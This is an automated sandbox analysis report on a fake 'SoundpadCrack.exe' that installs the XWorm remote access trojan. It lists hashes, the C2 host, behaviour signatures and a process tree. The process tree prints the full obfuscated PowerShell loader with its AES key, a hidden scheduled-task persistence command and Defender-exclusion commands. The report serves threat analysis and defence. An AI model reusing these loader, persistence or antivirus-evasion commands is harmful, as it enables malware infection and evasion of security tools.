Analysis

  • max time kernel
    109s
  • max time network
    122s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags
    arch:x64 arch:x86 image:win10v2004-20240611-en locale:en-us os:windows10-2004-x64 system
  • submitted
    29/06/2024, 22:12

General

  • Target

    SoundpadCrack.exe

  • Size

    8.7MB

  • MD5

    c0aeb81be9a7f88af4a36e3e646dc3c5

  • SHA1

    94817a864fb081074a7791a5d1ba118cf47a956d

  • SHA256

    054f6d798fd4a1ec3277da62d9e8e7dd7442cf2987ae28578381bdcb786342dd

  • SHA512

    88467c8e039175668804d2449c9036ca88ccb4406dd42f20b85c0562dd89e8df7eb6de0f55208f121d5755ea1d107615f3c277fb5bb9a5119a054c1ab99e330c

  • SSDEEP

    196608:V3GEsUvU3MyTpgJQLpdXk5AvRkYNd012erwKnFdZlGP1+H4mbqRHXjF:9sUMZTpgn5Ah3ozZlGNZI83h

Malware Config

Extracted

Family

xworm

Version

5.0

C2

might-hk.gl.at.ply.gg:42295

Mutex

07x0yTqR2FSkwbSm

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    systemprocess.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Runs PowerShell with the display window hidden.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 3 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with the open-source UPX packer or a modified variant of it.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SoundpadCrack.exe
    "C:\Users\Admin\AppData\Local\Temp\SoundpadCrack.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:228
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start "" "extrahelper.bat" & start "" "soundpad.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2232
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "extrahelper.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5096
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vJT6fStKg0zjGiy7XVLKIoIq02djrp3n5TnkMWwlDwM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hEEtcPzCu4poxw0XIUJw0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SHNnY=New-Object System.IO.MemoryStream(,$param_var); $qIcru=New-Object System.IO.MemoryStream; $LvUqn=New-Object System.IO.Compression.GZipStream($SHNnY, [IO.Compression.CompressionMode]::Decompress); $LvUqn.CopyTo($qIcru); $LvUqn.Dispose(); $SHNnY.Dispose(); $qIcru.Dispose(); $qIcru.ToArray();}function execute_function($param_var,$param2_var){ $zuAhi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LIRQa=$zuAhi.EntryPoint; $LIRQa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\RarSFX0\extrahelper.bat';$jhCzE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\RarSFX0\extrahelper.bat').Split([Environment]::NewLine);foreach ($Vlubi in $jhCzE) { if ($Vlubi.StartsWith(':: ')) { $gKUWY=$Vlubi.Substring(3); break; }}$payloads_var=[string[]]$gKUWY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:5016
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_12_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_12.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2968
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_12.vbs"
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:2120
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_12.bat" "
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1068
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vJT6fStKg0zjGiy7XVLKIoIq02djrp3n5TnkMWwlDwM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hEEtcPzCu4poxw0XIUJw0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SHNnY=New-Object System.IO.MemoryStream(,$param_var); $qIcru=New-Object System.IO.MemoryStream; $LvUqn=New-Object System.IO.Compression.GZipStream($SHNnY, [IO.Compression.CompressionMode]::Decompress); $LvUqn.CopyTo($qIcru); $LvUqn.Dispose(); $SHNnY.Dispose(); $qIcru.Dispose(); $qIcru.ToArray();}function execute_function($param_var,$param2_var){ $zuAhi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $LIRQa=$zuAhi.EntryPoint; $LIRQa.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_12.bat';$jhCzE=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_12.bat').Split([Environment]::NewLine);foreach ($Vlubi in $jhCzE) { if ($Vlubi.StartsWith(':: ')) { $gKUWY=$Vlubi.Substring(3); break; }}$payloads_var=[string[]]$gKUWY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                7⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • Drops startup file
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:3796
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3892
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4444
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\systemprocess.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3844
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'systemprocess.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3820
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Soundpad.exe
        "soundpad.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1688
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\SoundpadService.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\SoundpadService.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetWindowsHookEx
          PID:5012
        • C:\Windows\System32\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /s "C:\Windows\system32\UniteFx.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:1800
        • C:\Windows\System32\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /s "C:\Windows\system32\UniteFx.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:4176
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x4fc 0x504
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2656

Network

MITRE ATT&CK Enterprise v15

Downloads
